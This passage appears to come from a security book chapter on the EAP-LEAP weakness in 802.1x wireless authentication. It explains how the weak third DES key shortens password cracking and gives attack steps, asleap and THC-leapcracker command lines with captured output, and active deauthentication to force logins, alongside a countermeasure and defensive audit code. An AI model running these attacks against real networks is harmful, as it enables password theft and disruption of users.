802.1x is an IEEE standard for port-based (well, we would rather say interface-based) end-user authentication on LANs. While it supports (and was initially designed for) Ethernet, the main current use of 802.1x is wireless users' authentication as a part of the wireless security scheme provided by the 802.11i security standard. The 802.1x authentication chain consists of three elements:
Supplicant An end-user station, often a laptop, that runs 802.1x client software.
Authenticator A switch, a wireless gateway, or an access point to which the authenticating users connect. It must be configured to support 802.1x on the involved interfaces with commands like aaa authentication dot1x default group radius (global configuration) and dot1x port control auto (switch interface).
Authentication server A RADIUS server to which authenticators forward end users' authentication requests for verification and authentication decision.
The Extensible Authentication Protocol (EAP) is used by all three 802.1x component devices to communicate with each other. It is extensible since many different EAP types exist for all kinds of authentication plans, for example, employing SIM cards, tokens, certificates, and more traditional passwords. Here we are interested only in Cisco-related protocols and products, thus the security weaknesses of EAP-LEAP are the target of the discussion.
EAP-LEAP is a Cisco proprietary protocol, with its implementation code open for supplicant software and RADIUS servers, but not for authenticators. Thus, when using EAP-LEAP, deployment of Catalyst switches or Cisco Aironet access points is necessary. EAP-LEAP is also a very common security protocol, since it appeared in the early days of 802.1x, when its only competitor was EAP-MD5, a first and highly vulnerable EAP version. You can still encounter a lot of wireless LANs using EAP-LEAP when wardriving, and you'll see companies planning to install new wireless networks with EAP-LEAP-based authentication, despite the development of a more secure Cisco Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling (EAP-FAST) as well as other, more modern, nonproprietary EAP types. It is remarkable that EAP-LEAP was the first EAP type that started to support generation and distribution of dynamic Wired Equivalent Privacy (WEP) keys, which, together with the popularity of Cisco Aironet wireless equipment, promoted the spread of this protocol in wireless networking. Nowadays, dynamic Temporal Key Integrity Protocol (TKIP) keys can be used with EAP-LEAP instead of insecure WEP.
EAP-LEAP provides mutual authentication via a shared secret, which is a password known to both the connecting user and the RADIUS server. Of course, bad passwords can fall to dictionary attacks. In fact, the first tool written for attacking EAP-LEAP was a simple Perl dictionary attack utility called LeapCrack, which is a wrapper for the ancontrol BSD command. However, an easy-to-guess password is a user's or administrator's fault, not the authentication protocol's fault. If, however, we could deduce at least a part of a password by cryptanalysis, so that a shorter word becomes available for further dictionary or brute-force attacks, it becomes an entirely different matter. This is exactly the kind of exploitation we are going to discuss here.
Attack
The root of the problem is EAP-LEAP using Microsoft Challenge Handshake Authentication Protocol v2 (MS-CHAPv2) in the clear to authenticate users. Thus, several known MS-CHAPv2 flaws are inherited, including sending plaintext usernames (half of the guesswork gone), weak challenge/response Data Encryption Standard (DES) key selection, and an absence of salt in the stored NT hashes. All these flaws can be exploited to make cracking EAP-LEAP shared keys a much easier task. Let's have a look at the challenge/response process first.
In the beginning, the authenticator issues a random 8-bit nonce to the supplicant. Then the supplicant uses a 16-byte MD4 hash of a shared secret to generate three DES keys:
1. NT1 - NT7
2. NT8 - NT14
3. NT15 - NT16 + \0 \0 \0 \0 \0
After that, each produced DES key is employed to encrypt the challenge nonce, generating 8 bytes of output per key; then a 24-byte response is sent back to the authenticator, which then issues a success or failure frame to the supplicant after consulting the RADIUS server.
The first problem here is that the third DES key is weak. The five nulls mentioned are present in every challenge/response. This leaves us a DES key size of 16 bits only. Cracking a 16-bit DES knowing the plaintext challenge is easy; in fact, it can be done within a second. This helps to calculate two out of eight MD4 hash bytes; as a result, only six are left. They can be cracked using a dictionary attack against a large prebuilt MD4 hash table. Considering the speed of the MD4 hash function, such a table would not take a lot of time to generate.
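To make the weak third key concrete, here is an added illustration (not code from the book or from any of the tools it discusses) of how a 16-byte hash is cut into the three key blocks listed above and how each 7-byte block is spread over an 8-byte DES key. The function names and the sample hash are constructed for this example, and setting odd parity in the low bit of each key byte is a convention assumed here; no DES encryption is performed.

```python
def split_nt_hash(nt_hash: bytes) -> list[bytes]:
    """Cut a 16-byte hash into the three 7-byte key blocks (NT1-7, NT8-14, NT15-16 + nulls)."""
    if len(nt_hash) != 16:
        raise ValueError("expected a 16-byte hash")
    padded = nt_hash + b"\x00" * 5          # 21 bytes: five nulls pad the last block
    return [padded[0:7], padded[7:14], padded[14:21]]


def expand_des_key(key7: bytes) -> bytes:
    """Spread 56 key bits over 8 bytes, 7 bits per byte, odd parity in bit 0."""
    bits = int.from_bytes(key7, "big")
    out = bytearray()
    for shift in range(49, -1, -7):          # 8 groups of 7 bits, most significant first
        b = ((bits >> shift) & 0x7F) << 1
        if bin(b).count("1") % 2 == 0:       # assumed convention: make parity odd
            b |= 1
        out.append(b)
    return bytes(out)


def third_key_space():
    """Enumerate every possible third DES key; return (count, constant byte positions)."""
    keys = {
        expand_des_key(bytes([a, b]) + b"\x00" * 5)
        for a in range(256)
        for b in range(256)
    }
    constant = [i for i in range(8) if len({k[i] for k in keys}) == 1]
    return len(keys), constant


# Constructed sample value, not a real password hash.
SAMPLE_HASH = bytes(range(16))

if __name__ == "__main__":
    for n, block in enumerate(split_nt_hash(SAMPLE_HASH), 1):
        print(f"key {n}: block {block.hex()} -> DES key {expand_des_key(block).hex()}")
    count, constant = third_key_space()
    print(f"third key: {count} possible keys, bytes {constant} never change")
```

The first two keys each carry 56 unknown bits, while the third takes only 65536 values, with five of its eight key bytes identical for every password.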
To summarize, here is an actual attack:
1. Build a large list of MD4-hashed passwords.
2. Sniff out EAP-LEAP challenge/response frames.
3. Obtain challenge, response, and username from the frames.
4. Use the response to calculate the last two bits of the MD4 hash.
5. Launch the dictionary attack against the remaining six bits of the hash, using the list from Step 1.
A few tools can be used to implement this attack, namely Joshua Wright's asleap-imp, THC-leapcrack, and leap by DaBubble, Bishop, and Evol. Asleap-imp was the first tool to be described to the general public (at DEFCON 11) and is very mature. Thus, we will center on this particular piece of software here. Asleap-imp consists of two utilities. Genkeys generates a list of MD4 hashes from a supplied password list. This list is created as a "password<Tab>hash" table and is useful for dictionary-type attacks against any MD4 password file. The second utility, asleap, implements the practical attack itself in the following way:
The data is taken from a wireless interface in the RFMON (radio frequency monitoring) mode or a pcap format dump file, such as Kismet or Ettercap dump:
arhontus / # ./asleap -D
arhontus / # ./asleap -i <interface name> -o -t 10 -v
or
arhontus# ./asleap -r <pcap dumpfile> -v
EAP-LEAP challenge/response frames are flagged out.
The last two bits of the MD4 hash are calculated using the third weak DES key.
Cracked and remaining bits are compared against the password:hash table generated by genkeys. Found passwords are reported.
Since waiting for legitimate EAP-LEAP logins can take plenty of time, asleap-imp can knock the authenticated wireless users offline by scanning through all 802.11 channels, identifying connected clients, and sending spoofed EAP-LEAP logoff frames to them. This is followed by spoofed deauthentication frames to drop clients from wireless LANs (WLANs), triggering a new challenge/response exchange. The exchange is dumped as a pcap format file to allow further password cracking on a more powerful machine. The option to specify this "active attack" is -a; AirJack drivers are required for injection of spoofed EAP-LEAP and deauthentication frames. A live example of an attack using asleap-imp against a Kismet dump file is as follows:
arhontus / # ./genkeys -r worldlist-all -f hashtable -n index.idx
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
1614816 hashes written in 3.76 seconds: 429699.99 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 18363792 compares.
Creating index file (almost finished) ...Done.
arhontus / #./asleap -r eap-leap-containing-dump -v -f hashtable -n index.idx
arhontus / # ./asleap -r /eap-dumps -v -f hashtable -n index.idx
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP challenge:
0802 7500 0040 9641 b67f 0040 9645 a06c ..u..@.A...@.E.l
0040 9645 a06c a0c5 aaaa 0300 0000 888e .@.E.l..........
0100 001f 0100 001f 1101 0008 223c 6e74 ............"<nt
1050 1e46 4543 454d 415c 625f 636c 6179 .P.FCEM_user
746f to
6e n
Captured LEAP response:
0801 a200 0040 9645 a06c 0040 9640 d983 .....@.E.l.@.@..
0040 9645 a06c 309b aaaa 0300 00f8 888e .@.E.l0.........
0100 002f 0200 002f 1101 0018 4929 d530 .../.../....I).0
41d2 fecc 0de4 968a 9283 92c9 0a99 dcd0 A...............
38e6 1e67 494d 4543 454d 415c 685f 7465 8..gIMCEM_us
7261 ra
6e n
Captured LEAP auth success:
0802 7500 0040 9640 d983 0040 9645 a06c ..u..@.@...@.E.l
0040 9645 a06c 6007 aaaa 0300 0000 888e .@.E.l'.........
0100 0004 0300 0004 ........
Captured LEAP exchange information:
username: ECEMA_user1
challenge: 223c6e7410501e46
response: 4929d53041d2fecc0de4968a928392c90a99dcd038e61e67
Attempting to recover last 2 of hash.
Could not recover last 2 bytes of hash from the challenge/response.
Sorry it didn't work out.
Captured LEAP challenge:
0802 7500 0040 9641 9bce 0040 9647 b8bf ..u..@.A...@.G..
0040 9647 b8bf 90ca aaaa 0300 0000 888e .@.G............
0100 001f 0100 001f 1101 0008 7971 0775 ............yq.u
f011 de15 4543 454d 415c 765f 6d63 656e ....ECM_user
7465 te
65 e
Captured LEAP response:
0801 a200 0040 9647 b8bf 0040 9641 9bce .....@.G...@.A..
0040 9647 b8bf 00b7 aaaa 0300 00f8 888e .@.G............
0100 0031 0200 0031 1101 0018 4f4c eef0 ...1...1....OL..
23a6 ac29 d964 fe95 0014 2d99 74b4 9277 #..).d....-.t..w
c0ae 07d3 494d 4543 454d 415c 765f 6d63 ....IMCEM_us
656e 7465 65 entee
Captured LEAP auth success:
0802 7500 0040 9641 9bce 0040 9647 b8bf ..u..@.A...@.G..
0040 9647 b8bf d0ca aaaa 0300 0000 888e .@.G............
0100 0004 0300 0004 ........
Captured LEAP exchange information:
username: ECM_user
challenge: 79710775f011de15
response: 4f4ceef023a6ac29d964fe9500142d9974b49277c0ae07d3
Attempting to recover last 2 of hash.
hash bytes: 7a6b
Starting dictionary lookups.
Found a matching password! w00t!
<password has been skipped>
Reached EOF on pcapfile.
Note that asleap-imp can be installed and utilized on both Linux and Windows. Both genkeys and asleap can be compiled on Windows platforms using the WinPcap developer's pack that can be downloaded from http://www.winpcap.org/. To scan for vulnerable WLANs with asleap on Windows, you will need AiroPeek NX drivers (try out the demo version of AiroPeek NX from http://www.wildpackets.com/products/demos/apwnx). You can also parse AiroPeek .apc dumps with asleap using the -r flag.
To compile asleap-imp on Windows, do the following:
Get and set up WinPcap.
Obtain and install cygwin with the win32api package and development tools.
Get and unzip the WinPcap developer's pack.
Edit the makefile.cygwin file, changing the WPDPACK line to correspond to the path where you extracted the WinPcap developer's pack.
Execute make -f makefile.cygwin to build the tools. If you want to copy the asleap.exe and genkeys.exe files to another Windows box that doesn't have cygwin installed, you'll also need to copy the cygwin1.dll and cygcrypt-0.dll files with them.
Note | Precompiled Windows binaries are also available at Sourceforge (http://www.sourceforge.net/). |
Keep in mind that it won't be possible to execute an active attack against EAP-LEAP-supporting WLANs from Windows, since AirJack drivers are required. Unfortunately, AirJack is no longer maintained by Abaddon. Fortunately, we picked up the active maintenance and released a version of AirJack for 2.6.x Linux kernels that you can download at http://www.wi-foo.com/soft/attack/airjack26-0.1a.tar.bz2.
THC-leapcracker is similar in functionality to asleap-imp, but with a few twists. For example, its getleap utility can spoof the access point LEAP response, so the targets are fed the attacker-defined nonce to calculate the challenge response. A possible advantage of this functionality is that the nonce is identical for all wireless users, which means the attacker can use a single precompiled password/hash table for all targets. THC-leapcracker also has its own wordlist generator (wordgen) and a utility to do mass user deauthentication. The use of its main utility, leap-cracker, is self-explanatory:
arhontus / # ./leap-cracker
NTChallengeResponse Attack Tool written by DeX7er '03 (dexter@thc.org) Ver.0.1
Note | You can always get the latest version and other cool stuff at http://www.thc.org. |
You can use THC-leapcracker to reverse NtChallengeResponse hashes to cleartext passwords, for example, sniffed Cisco LEAP Passwords. Run the tool with the -h flag for usage options:
This code is Proof of Concept (POC) and comes without any warranty, so use it on your own risk.
It is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the license, or (at your option) any later version.
Usage: ./leap-cracker [-l <Password length>] [-a <Alphabet string>] [-w <Alphabet string>] [-b <filename>] [-f <filename>] [-u <filename>] [-t <NtChallengeResponse>][-c <challenge>] [-p refix][-v] [-o]
-l password length (max. 15)
-a alphabet (the characters that should be used to build the password)
-w alphabet input with wildcars: a-z; A-Z; 0-9
-f use a wordlist file for password cracking instead of the alphabet generator(Pwd length max. 15 characters). (without -l, -a or -f the default filename 'wordlist.txt' is used)
-b bruteforce attack against pre-compiled binary password file (generated with passwords_convert2bin)
-u userlist (ASCII Format: USERNAME CHALLENGE NTCHALLENGERESPONSE)
-t sniffed NT Challenge Response Hash (24 hexdigits) following formats are supported: "FFFF...","FF FF"...,"FF-FF...","ffff...","ff ff"..., "ff-ff...","ff:ff..." (e.g. cut'n paste from ethereal (all blanks, '-' and ':' are ignored)
-c challenge. The 8 byte random value that is used to calculate the NT Challenge Response. Input format is the same like for the -t option. Default value, if not set, is 'deaddeaddeaddead'.
-p prefix for password generation (password = [prefix]+[generated combinations]
-v check number of combinations, ask before starting brute force attack and verbose output
-o output to stdout (show all generated pwd combinations (only for debugging))
max. number of combinations = 18446744073709551615
Hint: The way in which order the passwords are generated, depends on the order of your input. The algorithm is a number system algorithm, so your alphabet characters are the number system members.
E.g.: -a 01 -l 3 means the passwords are generated like this: 000,001,010,011,100,...
-a abc -l 3 means the passwords are generated like this: aaa,aab,aac,aba,abb,...
-a cba -l 3 means the passwords are generated like this: ccc,ccb,cca,cbc,cbb,...
Example for Password = 'awctlr' with alphabet generator:
./leap-cracker -l 6 -a abcdefghijklmnopqrstuvwxyz -t 34f208583cda2e6674749fa08fff18663fb75c01c6537082 -c 102db5df085d3041 -v
Example for Password = 'cisco123' with a ASCII wordlist file 'wordlist.txt':
./leap-cracker -f wordlist.txt -t \
1ef803cbfb06a09867f5ebf56b04f7a036954f13b81896cc -c 102db5df085d3041
Example for an ASCII wordlist file 'wordlist.txt' and userlist file 'userlist.txt':
./leap-cracker -f wordlist.txt -u userlist.txt
Example for a pre-compiled passwordlist file 'wordlist.bin' and a userlist file 'userlist.txt', using the default challenge
./leap-cracker -b wordlist.bin -u userlist.txt
Example for a userlist compared with generated passwords starting with cisco+[nnn] where nnn are numbers from 0-9
./leap-cracker -u userlist.txt -p cisco -l 3 -w 0-9
THC-leapcracker requires AirJack drivers to run active attacks, and without AirJack being installed, both get-leap and all-deauth tools will not compile.
Both asleap-imp and THC-leapcracker can be used to attack wired switched networks just as well. Obviously, you won't be able to deauthenticate Ethernet users, but sending EAP-LEAP logoff frames is still a valid option, as well as a variety of efficient DoS attacks on LANs, such as ARP-based ones.
Countermeasure | The most obvious and easy countermeasure would be to select strong user passwords. However, a limited size of the shared secret when 2 bytes are subtracted means that even good passwords have a chance of falling to brute-force attacks. Thus, a recommended solution is not to use EAP-LEAP at all. Cisco has developed a novel nonproprietary EAP type to replace EAP-LEAP, namely EAP-FAST. So, if you are keen on implementing a Cisco-specific user authentication solution, use EAP-FAST instead. EAP-FAST is not susceptible to the attack against EAP-LEAP we have outlined in this section. EAP-FAST is described in detail in the IETF informational draft at http://www.ietf.org/internet-drafts/draft-cam-winget-eap-fast-02.txt. |
EAP-FAST provides a seamless migration from EAP-LEAP, does not require digital certificates and Public Key Infrastructure (PKI) support on end-user hosts, and is easily integrated with both Microsoft Active Directory and Lightweight Directory Access Protocol (LDAP). One-time passwords can also be used. Visit http://www.cisco.com/warp/public/cc/pd/witc/ao1200ap/prodlit/eapfs_qa.htm to find more about this security protocol.
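Retiring EAP-LEAP starts with knowing which accounts still authenticate with it. The following added example (not from the book or from the tools it describes) parses the LLC/SNAP, EAPOL and EAP header layout visible in the frame dumps earlier in this section and reports which usernames appear in LEAP exchanges; the function names and the sample frames are constructed for this illustration.

```python
import struct

EAP_TYPE_LEAP = 17                      # 0x11, the type byte that follows the EAP length
LLC, ETHERTYPE_8021X = b"\xaa\xaa\x03", b"\x88\x8e"


def parse_leap(payload: bytes):
    """Parse bytes starting at the LLC/SNAP header; return None unless it is LEAP."""
    if len(payload) < 16 or payload[:3] != LLC or payload[6:8] != ETHERTYPE_8021X:
        return None
    eapol_type = payload[9]             # 0 = EAP-Packet
    eap = payload[12:]                  # skip 8-byte LLC/SNAP and 4-byte EAPOL header
    if eapol_type != 0 or len(eap) < 8:
        return None                     # e.g. EAP success, which has no type field
    code, _id, eap_len, eap_type, _ver, _unused, count = struct.unpack("!BBHBBBB", eap[:8])
    eap = eap[:eap_len]
    if code not in (1, 2) or eap_type != EAP_TYPE_LEAP or len(eap) < 8 + count:
        return None
    return {
        "kind": "challenge" if code == 1 else "response",
        "value_len": count,             # 8 for a challenge, 24 for a response
        "username": eap[8 + count:].decode("ascii", "replace"),  # sent in the clear
    }


def audit(frames):
    """Map each username seen in a LEAP exchange to the message kinds observed."""
    seen = {}
    for frame in frames:
        info = parse_leap(frame)
        if info:
            seen.setdefault(info["username"], set()).add(info["kind"])
    return seen


def build_eap(code, eap_type, body):
    """Build a constructed sample frame: LLC/SNAP + EAPOL + EAP header + body."""
    eap_len = 5 + len(body)
    eap = struct.pack("!BBHB", code, 0, eap_len, eap_type) + body
    return LLC + b"\x00\x00\x00" + ETHERTYPE_8021X + struct.pack("!BBH", 1, 0, eap_len) + eap


def leap_body(value, user):
    return bytes([1, 0, len(value)]) + value + user


# Constructed sample frames; the username and values are made up.
SAMPLE_FRAMES = [
    build_eap(1, EAP_TYPE_LEAP, leap_body(bytes.fromhex("0102030405060708"), b"LAB\\alice")),
    build_eap(2, EAP_TYPE_LEAP, leap_body(bytes(range(24)), b"LAB\\alice")),
    build_eap(1, 1, b""),               # EAP Identity request, not LEAP
    build_eap(2, 25, b"\x00" * 6),      # another EAP type, not LEAP
]
```

Any username returned by audit() belongs to a client that still needs to be moved to another EAP type.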